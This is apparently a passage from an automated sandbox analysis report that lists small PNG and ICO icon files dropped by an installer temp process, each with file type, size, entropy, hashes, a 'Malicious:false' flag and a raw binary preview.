                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.S{H.Q.=....)Y....|4..CmeZZ*....!dQ..J..J..aI..... %.LILK..0....SI..H3|l.}[[O.........K.K.....s."#.DB...a...t........hAb\..h4NG.....7j..W.z.fK.3R.....emD4c%...0.....7?a.9.GY..g.......x..<.c..3@....#.......>}....X...v.j.W.$(.....]..(.lF..A..G..m.oU.UW/r..p..1^t..pj4.Y..x...=G...X'[..-..j.NW>.Z.Gdn.E.[..&....'+...@.uk..........Oqd....~r.).G....1.W.L.........@..(..g..![....P..eI...(...(Y....:...h(J.......j.7.......D..M`.....Zd.6B$...rD...K..e2.\....I8..ao..h....Y.|.&... .t@X...u/q.........T,M......Q.%.Vs...!."....rw.GYC.Z.9...a#....G.l51D^..i..... .J?W.hF.>0......(..m=Z.hG.5O...........=%.P.H..-C..P..?.=V.#..~........M....2..T.?..D....._$....qg]....@$...d4.....[j2.....AF%.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):658
                                                                                                                                                                                                                                                          Entropy (8bit):7.412255128365162
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7wM6ZjAgxNF+Q7L4f031MIYJqGdhz90Iq7AGg71T+51fDPgME:XMOxbL4+S1nJ0xk71TYzgP
                                                                                                                                                                                                                                                          MD5:79AEBF6646108C56AA59E1D27672A308
                                                                                                                                                                                                                                                          SHA1:BAA186067518DFA1F18A2AFCB50AF03041E40AA4
                                                                                                                                                                                                                                                          SHA-256:B64E7582BFD5CD8AAE7F9AB31B2B12AFF640857B6670873D94C15D0CE70533D9
                                                                                                                                                                                                                                                          SHA-512:D41A2F5A204B43DADF5CC461EB1E713187B6AF616FF651A06299574C7BE1E8E9A634E9259C3B63594E627DE2FC8B5DE4CC02FD2DF5F51E924E74C74A7EAD515A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4.......tEXtCreation Time.12/12/08.Z......IDAT8...MkSQ...s.I./.ik...S..bA1[7n...H@...[...D.n.U..E.bAcH.$MC.....ZIc...8...w..U.=..UsbUU).;.F.+.R3....U.I%P4.E...V.......9rT.].X,V"n.\."&.3.2pn.R."...o...".L`.=..9>...-...w.y..\..#g.^...@..z..P...Z.D......D.ApA.*.........pD.:|...&.x..p......5..R.w..x....SY.../.J&.I..H...'...X....=A.x..&...{....b.0.cEp..:............%..$&........g;f.P..6..t~.S.R.>...[6..s=x.u.r&.O...^..jJQDc0b..............'tc.ec8.#..z......>\..M..b.;.<%..4.0v....o..V/b...&g|mo"..^...N..#.).#..fB....:..t......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.836023872190528
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DNZdMMMMYVyz2pwij2kQauIG+wEvP3EkBChMc0kkkkke8x2R+Mxz6wwwwwwwwwwg:3qVyb0up+wEXvku8x2R+MlZwwwwwwwwh
                                                                                                                                                                                                                                                          MD5:881D10F5781985AD7299364314CEB948
                                                                                                                                                                                                                                                          SHA1:4F7B1A21207997EE749EABB0310E6AF507F7A502
                                                                                                                                                                                                                                                          SHA-256:F7DD472A36C95EDC749DCAF7CCD44ADD8D3A9DE083101BDE1DD6994051374082
                                                                                                                                                                                                                                                          SHA-512:476D739E9315B2087B0AE8DA53C8DFEB3747DE7C9548C25648B6254B7A91DCEAC10096DDC04175997D268A32612197BE07C685A4BB33643ED544FBCAC947DF88
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................q...q...q...q...q...q...q...q...q...q...q...q...q...q...q...q...n...n...n...z...................................z...n...n...n...j...j...................................................j...j...g...t.......x...g...g...g...g...g...g...g...g...x.......s...g...c...........c...c...c...h...........g...c...c...c...........c..._|.........._|.._|.........................._|.._|.........._|..\m..........\m..ar......z...\m..\m..{.......`r..\m..........\m..Y_..........Y_..........Y_..Y_..Y_..Y_..........Y_..........Y_..cV..........cV..........cV..cV..cV..cV..........cV..........cV..mN..........mN..rS.......n..mN..mN...o......rS..mN..........mN..xE..........xE..xE...m...................m..xE..xE..........xE...=..........=...=...=...C...n...n...C...=.......N..........=...4...F.......J...4...4...4...4...4...4...4...8...K.......E...4...,...,...l...................................k...,...,...............A.....................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):813
                                                                                                                                                                                                                                                          Entropy (8bit):7.700988619334296
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:2/3exgROSyP3NqUTxBlR8kEPzRspi/MKFhG1Bx:hQOZNVR8HVZkKDG1v
                                                                                                                                                                                                                                                          MD5:6EC205B2369CA054BF85B085486CED9D
                                                                                                                                                                                                                                                          SHA1:26C0B61289F804913164DDDAD8F905E12C8BD4A3
                                                                                                                                                                                                                                                          SHA-256:7E436D02E18B665764D2F2C748068AC8069DB59BCDDA9983F09EA370D742474E
                                                                                                                                                                                                                                                          SHA-512:A446CB697276D8AB014E0A38FFB0F6F31FC1BE4DD27A0A795829F4E844237243EE6B7A92A881841DA30F4E3E7A396E6065DAEB4C868CAD7EE195162CCDE0ADBA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.m.[hTW...}f....8Ij.51!.TI.h.^PJ........*...|.O}RKQ..D.|....,H.. -i....4...1..h&.....]{...v..........,.?.}.......2../...r...........zH% .Z.fA...%;>.. ..MT.+.....c....r....!......%pS.c.......k/..O...W.$Wm.].`.....N.g.......m...b.VTg#zY.j....4T..b.|^..D7....'....\.z....J.j{(....F(.Y.3"..w`^....p.....j.:...........@;.z..UUB...O.E..6.7]..6..5,.J..Y2-...I.1(TJ..Tt...&.#.V..PH.|.[...O....2.....[."+...2....8..K..=..;c4.....uRO[....a...........Z./.3........^{0%.$7|..r7Np..\'.Hw....2..1..+(#.......e%B.saZ:...&s........D...g.3/ ...o*........Q."....Bo:+.@.(_........^m"0..x../..../Q....*.p.C............y;.'.M.*.f.y'Nb........B.|...(..~e.5.....'..w...A...y.|.....B.....z..=$.......$.k.C~...a..1.}...sNH.q;..Y..o...j.].'..~.)..H.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):706
                                                                                                                                                                                                                                                          Entropy (8bit):7.638733880632528
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7Uqs1+tuWPx3jbdb1W7vVeaQkcbxKOd1MB09EVxRXXstDRpROyXSF:3qs1vWPxTugaxcbxKwMB09EjUVOyg
                                                                                                                                                                                                                                                          MD5:B9A06A13BF911BA4288024CB22CD4B8E
                                                                                                                                                                                                                                                          SHA1:43D03CC1C89C311CD7E8F39D531341D71CEA5C98
                                                                                                                                                                                                                                                          SHA-256:E37F73F2FC45067F9F946BA9AC18E6D5C87FFDFB096853667699EA5CA116871E
                                                                                                                                                                                                                                                          SHA-512:417D7091DA9950B32A197599775BD72A9DD7A2D996F5F057B47D490A61AD70D697A3D2B293ECDDF0901D6EE482B86CBC04E808E08005550E7F0600AE5F1134A7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.m.KLSQ...so.........ipC0F..$*..h._....H...r.[.........+.....X.......)-..B.....C..t.............).x(....&,/..x..n.`.F.9.y.S..U..bq.....M.f.08}..G"Q.LGC...GQW..B...&.)H|.c6.%DU...08..s.4.#..`..?..]....f. _..c.h.j{?..?q(0........}.h~'.........k..b.eZ.......f..KI0..+kz#..T/.....^.F.]..D`p....`........J8(..2.h]Z.d.j...4..`2.!..1.......KQ.......L..].K....Sq..(:.~CO.R...*4:..s.y.<.|Y..O.3..E]...'...e?.T?H@i.3..U.d,5.....8]..f...t.kh....T.....Xs.).....t.(.q.........0.....M...Y....[.O.Z...vkk......W$..2nl.......].OI..[........$g.2n|.'X..G..]...V..+..#7.|'."..K`jr..h.!...s..`_..Plvt....9..Zt.....D<...q6.8g.r.h..B.Y..]$.P.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.7202656984010085
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:JdJzibJG6NppClipAcGrwX6QG6tIR/8hINNIyJwy1I2Mleeyy7qVT:JdJz+BalipGZP6tIMINNIcV1I2Ml2y7a
                                                                                                                                                                                                                                                          MD5:EBFC3AD0B132D550ADC92A0F42776D1F
                                                                                                                                                                                                                                                          SHA1:335FFD8C4685F556F837F6E8D94D7058F4636023
                                                                                                                                                                                                                                                          SHA-256:1F00E5AE25225136ED95AD24D70C691C4367843E52A3E6D961F4E2009DFEA934
                                                                                                                                                                                                                                                          SHA-512:A834FD7402F572AB7D27A0547C4363A02C94DCD87E733AB7DA0CC1B25437657F8876F540EC06C544AFB6490449B6611311EE82C8F6E333771D7A00CD391D523D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................D.?.C..B...@...?...>...=...;...:...9...8...8...8...8...8..8./.F..Q...])..d/..b/..f1.........................._,..N...B...8..G..._+..g1..e0..d/..g2..........................a...V'..M...8...H...i3..h2..f1..e0..h2..........................b...W'..V&..8...I...k4..i3..h2..f1..h2..........................c/..Y(..W'..8...K...k4..j4..i3..g2..i3........................b...Z)..X(..8...L...l5..k4..j4..i3..g2..s@..............q?..^,..[*..Z)..9...M...l5..l5..k4..j3..h2..g2..i3..l5..l5..g2.._-..^,..\+..[*..:...N...l5..l5..l5..k4..j3..j3..t..........t..f1.._,..^,..\+..;...P...}M..U..Y..b..^..P..................~O..j:..e5..a0..=...Q...l..i..e..b..^..g..................g..n>..j;..f6..>...R...l..i..e..b..^..P..................~O..p@..k;..h7..?...T...l..i..e..b..^..}M..Z.........Z..q?..qA..m<..g5..@...U...X..i..e..b..^..[..~O..wD..uB..wE..vF..sB..n=..a/..B...V...m:..V..S..~P..{M..yJ..wG..uE..rA..o
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1143
                                                                                                                                                                                                                                                          Entropy (8bit):5.316029185743153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7u/BKpQr+mJEhtGXJoZ3ZbMzcLLUaMdEAfk8zKGPsl1:5Kpf3GXJoXMwL/MdEAfk87Ez
                                                                                                                                                                                                                                                          MD5:6C2EE6F053AB95D2AA3924EE689E80B9
                                                                                                                                                                                                                                                          SHA1:734FE9B1CAE77E70BE14D79B2A14B545AA249499
                                                                                                                                                                                                                                                          SHA-256:FC44A14405F3747A5D87DD09CCABB3C0E312B5E127929C6E2CF5920F125F132A
                                                                                                                                                                                                                                                          SHA-512:5BA51D89FD4BF61BE55AFC3210FB31ED7DAEA5C44D9829BF0CC48685EF283ADD50F53039748312CD57194085067D88BCD0B9FA0A58C462DA595E2BB54534FFF5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............(-.S....sRGB.........gAMA......a.....PLTE.Nm.Ex.Sr._Y.Vc.m\.|_.r`.ra.5..,..4..=..8.....C..N..E..F..J..K..A..k..n..o..m..m..n..l.....c.g.h.z.{.g..j.s.t.x..n..z..q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................./V.4....pHYs...........~.....tEXtSoftware.paint.net 4.1.6.N......IDAT(S]..;.Q....t..9&K.......R(.U(!DD....<.....y....eE......X.p.+4...f.k....n....E)e(.....%..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):404
                                                                                                                                                                                                                                                          Entropy (8bit):6.917623353697257
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/LcZn9Kk5YNxqZcvZ46+mxhdPGDjrc:KZUIYNxtvPZV
                                                                                                                                                                                                                                                          MD5:483305114EBE1A4A44773D21D611216C
                                                                                                                                                                                                                                                          SHA1:3C0FBD8BA2AE801A9B03CC238AB641E65E9B67D2
                                                                                                                                                                                                                                                          SHA-256:A150DC4A0B8367A03736C12A4851EB29D780D3EE2B1D0709B417BE0A5FCE1774
                                                                                                                                                                                                                                                          SHA-512:706D04A9BAC5EFA0F85A2070305BF52908D1D4DFF1AE27B4EA09E7BAC291D94B2E980EEEEA9A9C29559E2C728E44C276561F559532E3DFB929AD70C4829FA111
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...........~.....tEXtSoftware.paint.net 4.1.6.N......IDAT8Oc.......Ya..s...f......-;+,....l.. 9...Z....."..@...`.^...G.I..Az......&y....yI..q.,$..h...l..v..............n.H/.6...........vh.?,...4../..O..wQU....8..n..?....wYG.C...^....$.9......h<'(..M.(...N.g......U..i.9!..@z>.^.T...AI........3.5.........00...!s&...T....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
